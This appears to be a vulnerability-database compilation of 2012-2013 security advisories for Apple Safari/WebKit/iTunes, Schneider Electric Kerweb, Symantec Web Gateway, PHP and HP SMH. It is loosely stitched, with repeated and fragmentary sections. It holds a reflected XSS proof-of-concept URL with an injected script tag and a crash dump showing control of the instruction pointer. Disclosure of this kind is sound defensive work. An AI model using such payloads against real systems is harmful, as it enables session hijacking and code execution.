http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the location bar's URL via a crafted web site. Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. The vulnerability exists in versions of Safari prior to Apple iOS 5.1.1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update iOS 5.1.1 Software Update is now available and addresses the following: Safari Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A maliciously crafted website may be able to spoof the address in the location bar Description: A URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems. CVE-ID CVE-2012-0674 : David Vieira-Kurz of MajorSecurity (majorsecurity.net) WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: Multiple cross-site scripting issues existed in WebKit. CVE-ID CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest CVE-2011-3056 : Sergey Glazunov WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in WebKit. CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team Installation note: This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad. The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "5.1.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPpBcyAAoJEGnF2JsdZQeexJYH/0aYO0MULFXYARidSV22JdjG a1+yXKn8Rv2vv+8yStgKK2mWu18hvYWQ+whtvCzs1OefiVsq1nOvdCL1G62ybcYv O9BiHEDsuu+On2nAPiglu+luokByKLlZcIaM1Qa3pXHkiI8jlH7y7XuuoFsVt1Vc 284JgvV/sHnvesne2GsNyoRBJjfkliqXCgb1zmQWO9xX7HEJCaMNlc5Bwdonm26q 3OEKr2UQxvmWCbnCroiQ5KmEM+gLJSfLLOymow9xa4gM8aM87BXGWNMEKVs8LRLm dHngmEmzEa/Fx9PnR7rqjTCAMS8hR7aFcCYNTWjfR+keRXx7OHhCm88MfndryS8= =qhqL -----END PGP SIGNATURE-----

WebKit in Apple iOS before 5.1.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. WebKit is prone to an unspecified memory-corruption vulnerability. An attacker can exploit this issue by enticing an unsuspecting user into visiting a malicious webpage with a vulnerable application. Very few technical details are currently available. We will update this BID when more information emerges. iTunes is a free application for your Mac or PC. It lets you organize and play digital music and video on your computer. It can automatically download new music, app, and book purchases across all your devices and computers. And it’s a store that has everything you need to be entertained. Anywhere. a specially crafted .M3U file. Successful exploitation could allow execution of arbitrary code on the affected node.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (940.fc0): Access violation - code c0000005 (!!! second chance !!!)<br/> eax=41414141 ebx=08508cd8 ecx=41414141 edx=052a6528 esi=052a64b0 edi=0559ef20<br/> eip=41414141 esp=0012d8e8 ebp=7c90ff2d iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206<br/><unloaded_card.dll>+0x41414130:<br/> 41414141 ?? ???<br/><br/> ~~~<br/><br/> (6b0.a04): Access violation - code c0000005 (!!! second chance !!!)<br/> eax=41414141 ebx=00000000 ecx=00000014 edx=41414141 esi=41414141 edi=0187e10d<br/> eip=0187deec esp=0b0cfcd0 ebp=0b0cfcf0 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206<br/> Defaulted to export symbols for C:\Program Files\Common Files\Apple\Apple Application Support\CoreFoundation.dll -<br/> CoreFoundation!CFWriteStreamCreateWithAllocatedBuffers+0x40:<br/> 0187deec 8b00 mov eax,dword ptr [eax] ds:0023:41414141=????????<br/></unloaded_card.dll></code><br/> --------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 EN (32bit)Microsoft Windows 7 Ultimate SP1 EN (64bit). WebKit is a set of open source web browser engines jointly developed by companies such as KDE, Apple (Apple), and Google (Google), and is currently used by browsers such as Apple Safari and Google Chrome. Vulnerabilities exist in WebKit versions prior to Apple iOS 5.1.1. ============================================================================ Ubuntu Security Notice USN-1524-1 August 08, 2012 webkit vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 LTS Summary: Multiple security vulnerabilities were fixed in WebKit. Software Description: - webkit: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKit browser and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 LTS: libjavascriptcoregtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libjavascriptcoregtk-3.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-1.0-0 1.8.1-0ubuntu0.12.04.1 libwebkitgtk-3.0-0 1.8.1-0ubuntu0.12.04.1 After a standard system update you need to restart your session to make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1524-1 CVE-2011-3046, CVE-2011-3050, CVE-2011-3067, CVE-2011-3068, CVE-2011-3069, CVE-2011-3071, CVE-2011-3073, CVE-2011-3074, CVE-2011-3075, CVE-2011-3078, CVE-2012-0672, CVE-2012-3615, CVE-2012-3655, CVE-2012-3656, CVE-2012-3680, https://launchpad.net/bugs/1027283 Package Information: https://launchpad.net/ubuntu/+source/webkit/1.8.1-0ubuntu0.12.04.1 . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Apple iTunes Two Vulnerabilities SECUNIA ADVISORY ID: SA49489 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49489/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49489 RELEASE DATE: 2012-06-12 DISCUSS ADVISORY: http://secunia.com/advisories/49489/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49489/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49489 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has reported two vulnerabilities in Apple iTunes, which can be exploited by malicious people to compromise a user's system. 1) An error in the handling of .m3u playlists can be exploited to cause a heap-based buffer overflow via a specially crafted M3U (".m3u") file. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Gjoko Krstic, Zero Science Lab. ORIGINAL ADVISORY: Apple: http://support.apple.com/kb/HT5318 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-07-1 iOS 5.1.1 Software Update iOS 5.1.1 Software Update is now available and addresses the following: Safari Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: A maliciously crafted website may be able to spoof the address in the location bar Description: A URL spoofing issue existed in Safari. This could be used in a malicious web site to direct the user to a spoofed site that visually appeared to be a legitimate domain. This issue is addressed through improved URL handling. This issue does not affect OS X systems. CVE-ID CVE-2012-0674 : David Vieira-Kurz of MajorSecurity (majorsecurity.net) WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: Multiple cross-site scripting issues existed in WebKit. CVE-ID CVE-2011-3046 : Sergey Glazunov working with Google's Pwnium contest CVE-2011-3056 : Sergey Glazunov WebKit Available for: iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2 Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in WebKit. CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team Installation note: This update is only available through iTunes, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes will automatically check Apple's update server on its weekly schedule. When an update is detected, it will download it. When the iPhone, iPod touch or iPad is docked, iTunes will present the user with the option to install the update. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iPhone, iPod touch, or iPad. The automatic update process may take up to a week depending on the day that iTunes checks for updates. You may manually obtain the update via the Check for Updates button within iTunes. After doing this, the update can be applied when your iPhone, iPod touch, or iPad is docked to your computer. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "5.1.1". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPpBcyAAoJEGnF2JsdZQeexJYH/0aYO0MULFXYARidSV22JdjG a1+yXKn8Rv2vv+8yStgKK2mWu18hvYWQ+whtvCzs1OefiVsq1nOvdCL1G62ybcYv O9BiHEDsuu+On2nAPiglu+luokByKLlZcIaM1Qa3pXHkiI8jlH7y7XuuoFsVt1Vc 284JgvV/sHnvesne2GsNyoRBJjfkliqXCgb1zmQWO9xX7HEJCaMNlc5Bwdonm26q 3OEKr2UQxvmWCbnCroiQ5KmEM+gLJSfLLOymow9xa4gM8aM87BXGWNMEKVs8LRLm dHngmEmzEa/Fx9PnR7rqjTCAMS8hR7aFcCYNTWjfR+keRXx7OHhCm88MfndryS8= =qhqL -----END PGP SIGNATURE----- . CVE-ID CVE-2012-0672 : Adam Barth and Abhishek Arya of the Google Chrome Security Team WebKit Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.4, OS X Lion Server v10.7.4, Windows 7, Vista, XP SP2 or later Impact: A maliciously crafted website may be able to populate form inputs on another website with arbitrary values Description: A state tracking issue existed in WebKit's handling of forms. CVE-ID CVE-2012-0676 : Andreas Akre Solberg of UNINETT AS, Aaron Roots of Deakin University ITSD, Tyler Goen Note: In addition, this update disables Adobe Flash Player if it is older than 10.1.102.64 by moving its files to a new directory. This update presents the option to install an updated version of Flash Player from the Adobe website

Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric Kerweb before 3.0.1 and Kerwin before 6.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the evtvariablename parameter in an evts.xml action to kw.dll, (2) unspecified search fields, or (3) unspecified content-display fields. (1) kw.dll of evts.xml In action evtvariablename Parameters (2) Unspecified search field (3) Unspecified content display field. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The kw.dll provided by Schneider Electric Telecontrol Kerwin/Kerweb fails to properly filter the 'evtvariablename' parameter, etc., and an attacker can exploit the vulnerability for HTML injection attacks, build malicious WEB pages, entice users to parse, obtain sensitive information or hijack user sessions. Multiple Schneider Electric Telecontrol products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied data before it is used in dynamic content. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. The following products are affected: Schneider Electric Telecontrol Kerweb versions prior to 3.0.1 Schneider Electric Telecontrol Kerwin versions prior to 6.0.1. Thus, the web application suffers from multiple reflected XSS vulnerabilities. Exploitation is made easier as parameters are passed with GET HTTP method. Example: An URL can be forged by injecting code in one of the parameter, like 'evtvariablename' here: http://<server>/kw.dll?page=evts.xml&sessionid=xxx&nomenu=&typeevtwin=alms&dt=&gtvariablevalue=&ltvariablevalue=&variablevalue=&nevariablevalue=&evtclass=&evtdevicezone=&evtdevicecountry=&evtdeviceregion=&evtstatustype=&evtseveritytype=&evtstatus=&evtseverity=&evtlevel=&gtdateapp=&ltdateapp=&gtdaterec=&ltdaterec=&evtvariablename="</script><script>alert(1)</script>"&evtdevicename=&evtnature=&evttype=&gtduration=&ltduration=&gtdurationvalue=&gtdurationwide=1&ltdurationvalue=&ltdurationwide=1 Vendor status: Vendor was contacted and a fix was released (with Kerweb 3.0.1 and Kerwin 6.0.1) Mitigation: Upgrade to Kerweb 3.0.1 and Kerwin 6.0.1 CVE: CVE-2012-1990 Timeline: 06/20/2011: vendor disclosure (ticket reference : KN10915) 07/22/2011: vendor response 09/01/2012: fix released 05/05/2012: public disclosure --- phocean . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Schneider Electric Kerwin Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA49041 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49041/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49041 RELEASE DATE: 2012-05-10 DISCUSS ADVISORY: http://secunia.com/advisories/49041/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49041/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49041 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: phocean has reported some vulnerabilities in Kerwin, which can be exploited by malicious people to conduct cross-site scripting attacks. 1) Input passed via the "evtvariablename" parameter to kw.dll is not properly sanitised before being returned to the user. 2) Certain input used for searching and displaying content is not properly sanitised before being returned to the user. SOLUTION: Reportedly fixed in version 6.0.1. PROVIDED AND/OR DISCOVERED BY: phocean ORIGINAL ADVISORY: http://www.phocean.net/2012/05/08/cve-2012-1990-kerwebkerwin-xss-vulnerabilities.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. 3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: September 24, 2012 Bugs: #384301, #396311, #396533, #399247, #399567, #399573, #401997, #410957, #414553, #421489, #427354, #429630 ID: 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in PHP, the worst of which lead to remote execution of arbitrary code. Background ========== PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/php < 5.3.15 >= 5.3.15 < 5.4.5 >= 5.4.5 ------------------------------------------------------------------- # Package 1 only applies to users of these architectures: arm Description =========== Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All PHP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15" All PHP users on ARM should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5" References ========== [ 1 ] CVE-2011-1398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398 [ 2 ] CVE-2011-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379 [ 3 ] CVE-2011-4566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566 [ 4 ] CVE-2011-4885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885 [ 5 ] CVE-2012-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057 [ 6 ] CVE-2012-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788 [ 7 ] CVE-2012-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789 [ 8 ] CVE-2012-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830 [ 9 ] CVE-2012-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831 [ 10 ] CVE-2012-1172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172 [ 11 ] CVE-2012-1823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823 [ 12 ] CVE-2012-2143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143 [ 13 ] CVE-2012-2311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311 [ 14 ] CVE-2012-2335 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335 [ 15 ] CVE-2012-2336 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336 [ 16 ] CVE-2012-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386 [ 17 ] CVE-2012-2688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688 [ 18 ] CVE-2012-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365 [ 19 ] CVE-2012-3450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201209-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please refer to the following Mandriva advisories for further information: MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180, MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03839862 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03839862 Version: 1 HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-18 Last Updated: 2013-07-18 Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS. References: CVE-2011-3389 (SSRT100740) Remote disclosure of information CVE-2012-0883 (SSRT101209) Remote gain extended privileges CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS) CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS) CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS) CVE-2013-2355 (SSRT100696) Remote unauthorized Access CVE-2013-2356 (SSRT100835) Remote disclosure of information CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2361 (SSRT101007) XSS CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS) CVE-2013-2363 (SSRT101150) Remote disclosure of information CVE-2013-2364 (SSRT101151) XSS CVE-2013-5217 (SSRT101137) Remote unauthorized access SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2110 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2329 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-2335 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2336 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2355 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2356 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8 CVE-2013-2357 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2358 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2359 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2360 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2361 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2362 (AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0 CVE-2013-2363 (AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1 CVE-2013-2364 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2013-5217 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-alert@hp.com RESOLUTION HP has made System Management Homepage 